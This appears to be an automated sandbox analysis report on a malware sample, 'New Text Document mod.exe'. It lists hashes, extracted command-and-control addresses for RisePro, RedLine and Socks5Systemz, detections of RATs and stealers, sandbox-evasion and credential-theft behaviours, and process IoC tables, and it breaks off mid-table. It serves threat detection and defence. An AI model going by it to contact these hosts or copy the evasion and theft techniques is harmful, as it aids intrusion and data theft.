asyncrat | 82fbb67bf03714661b75a49245c8fe42141e7b68dda3f97f765eb1f2e00a89a9

Resubmissions

09/04/2024, 07:01

240409-htps3scd2w 10

09/04/2024, 07:01

09/04/2024, 07:00

09/04/2024, 07:00

07/03/2024, 22:29

Analysis

max time kernel
123s
max time network
606s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
07/03/2024, 22:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document mod.exe
Size

8KB
MD5

69994ff2f00eeca9335ccd502198e05b
SHA1

b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA256

2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512

ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
SSDEEP

96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Malware Config

Extracted

Family

risepro

193.233.132.62

147.45.47.116:50500

Extracted

Family

redline

Botnet

cheat

91.198.77.158:4483

Extracted

Family

socks5systemz

http://ejurbwh.ua/search/?q=67e28dd83e08a72b4108ad4e7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f671ea771795af8e05c645db22f31dfe339426fa11af66c152adb719a9577e55b8603e983a608ef619c5ed9d993d

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Neshta payload 1 IoCs

resource	yara_rule
behavioral2/files/0x00070000000232cf-1279.dat	family_neshta

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 2 IoCs

resource	yara_rule
behavioral2/memory/808-352-0x0000000002C40000-0x000000000352C000-memory.dmp	family_glupteba
behavioral2/memory/2908-359-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/files/0x0008000000023285-831.dat	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023246-156.dat	family_redline
behavioral2/memory/2452-191-0x0000000000440000-0x000000000045E000-memory.dmp	family_redline
behavioral2/files/0x00070000000232cd-1240.dat	family_redline
behavioral2/files/0x0009000000023309-1697.dat	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023246-156.dat	family_sectoprat
behavioral2/memory/2452-191-0x0000000000440000-0x000000000045E000-memory.dmp	family_sectoprat

Socks5Systemz
Socks5Systemz is a botnet written in C++.
botnet socks5systemz
StealthWorker
StealthWorker is golang-based brute force malware.
botnet stealthworker

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x000900000002333b-1792.dat	family_asyncrat

Contacts a large (6369) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	tupak.exe

StealthWorker payload 1 IoCs

botnet

resource	yara_rule
behavioral2/files/0x000a0000000232b4-1037.dat	stealthworker

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	tupak.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	tupak.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	New Text Document mod.exe
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	288c47bbc1871b439df19ff4df68f07666.exe
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	installer.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	InstallSetup_four.exe
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	timeSync.exe

Executes dropped EXE 34 IoCs

pid	Process
884	june.exe
4712	june.tmp
1884	cruisemailer.exe
856	cruisemailer.exe
4348	tupak.exe
4620	new.exe
2156	low.exe
1948	may.exe
212	timeSync.exe
2976	may.tmp
2452	s1.exe
5028	288c47bbc1871b439df19ff4df68f07666.exe
3808	InstallSetup_four.exe
808	288c47bbc1871b439df19ff4df68f076.exe
4360	FourthX.exe
2956	installer.exe
4964	installer.tmp
2616	netcorecheck_x64.exe
4508	netcorecheck_x64.exe
448	netcorecheck_x64.exe
2908	288c47bbc1871b439df19ff4df68f076.exe
4636	netcorecheck_x64.exe
1100	u2xs.0.exe
3632	u2xs.1.exe
1640	test.exe
5360	test.exe
5780	288c47bbc1871b439df19ff4df68f076.exe
5816	1.exe
6052	288c47bbc1871b439df19ff4df68f076.exe
5208	pef.exe
4616	p.exe
1884	nc64.exe
5880	Rar.exe
4316	vueqjgslwynd.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Wine	tupak.exe

Loads dropped DLL 19 IoCs

pid	Process
4712	june.tmp
2976	may.tmp
212	timeSync.exe
212	timeSync.exe
5360	test.exe
5360	test.exe
5360	test.exe
5360	test.exe
5360	test.exe
5360	test.exe
5360	test.exe
5360	test.exe
5360	test.exe
5360	test.exe
5360	test.exe
5360	test.exe
5360	test.exe
5360	test.exe
5360	test.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0010000000023260-427.dat	upx

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	152.89.198.214

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
147	raw.githubusercontent.com
606	raw.githubusercontent.com
696	raw.githubusercontent.com
146	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5994	ip-api.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	FourthX.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4348	tupak.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 808 set thread context of 2908	808	288c47bbc1871b439df19ff4df68f076.exe	127
PID 5780 set thread context of 6052	5780	288c47bbc1871b439df19ff4df68f076.exe	170

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5252	sc.exe
3280	sc.exe
5484	sc.exe
908	sc.exe

Detects Pyinstaller 4 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x000700000002325d-689.dat	pyinstaller
behavioral2/files/0x000700000002325d-700.dat	pyinstaller
behavioral2/files/0x000700000002325d-701.dat	pyinstaller
behavioral2/files/0x000700000002325d-727.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
724	3808	WerFault.exe	116
6028	212	WerFault.exe	109
5956	1100	WerFault.exe	130
4300	744	WerFault.exe	216

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	timeSync.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	timeSync.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u2xs.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u2xs.0.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4184	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3864	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1616	WMIC.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
5732	tasklist.exe
5636	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5660	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	288c47bbc1871b439df19ff4df68f076.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4740	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4856	PING.EXE

Suspicious behavior: EnumeratesProcesses 50 IoCs

pid	Process
4712	june.tmp
4712	june.tmp
4348	tupak.exe
4348	tupak.exe
4620	new.exe
4620	new.exe
4620	new.exe
4620	new.exe
2976	may.tmp
2976	may.tmp
2976	may.tmp
2976	may.tmp
2976	may.tmp
2976	may.tmp
2976	may.tmp
2976	may.tmp
2976	may.tmp
2976	may.tmp
2976	may.tmp
2976	may.tmp
212	timeSync.exe
212	timeSync.exe
2452	s1.exe
2452	s1.exe
2452	s1.exe
2600	powershell.exe
2600	powershell.exe
2600	powershell.exe
4400	msedge.exe
4400	msedge.exe
2824	msedge.exe
2824	msedge.exe
212	timeSync.exe
212	timeSync.exe
2908	288c47bbc1871b439df19ff4df68f076.exe
2908	288c47bbc1871b439df19ff4df68f076.exe
4360	FourthX.exe
5772	powershell.exe
5772	powershell.exe
5772	powershell.exe
1100	u2xs.0.exe
1100	u2xs.0.exe
5492	identity_helper.exe
5492	identity_helper.exe
4360	FourthX.exe
4360	FourthX.exe
4360	FourthX.exe
4360	FourthX.exe
4360	FourthX.exe
4316	vueqjgslwynd.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	4128	New Text Document mod.exe
Token: SeDebugPrivilege	2452	s1.exe
Token: SeDebugPrivilege	2600	powershell.exe
Token: SeDebugPrivilege	2908	288c47bbc1871b439df19ff4df68f076.exe
Token: SeImpersonatePrivilege	2908	288c47bbc1871b439df19ff4df68f076.exe
Token: SeDebugPrivilege	5772	powershell.exe
Token: SeDebugPrivilege	5816	1.exe

Suspicious use of FindShellTrayWindow 28 IoCs

pid	Process
4712	june.tmp
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
5816	1.exe
5816	1.exe

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
2824	msedge.exe
5816	1.exe
5816	1.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3632	u2xs.1.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4128 wrote to memory of 884	4128	New Text Document mod.exe	91
PID 4128 wrote to memory of 884	4128	New Text Document mod.exe	91
PID 4128 wrote to memory of 884	4128	New Text Document mod.exe	91
PID 884 wrote to memory of 4712	884	june.exe	93
PID 884 wrote to memory of 4712	884	june.exe	93
PID 884 wrote to memory of 4712	884	june.exe	93
PID 4712 wrote to memory of 1884	4712	june.tmp	94
PID 4712 wrote to memory of 1884	4712	june.tmp	94
PID 4712 wrote to memory of 1884	4712	june.tmp	94
PID 4712 wrote to memory of 856	4712	june.tmp	95
PID 4712 wrote to memory of 856	4712	june.tmp	95
PID 4712 wrote to memory of 856	4712	june.tmp	95
PID 4128 wrote to memory of 4348	4128	New Text Document mod.exe	102
PID 4128 wrote to memory of 4348	4128	New Text Document mod.exe	102
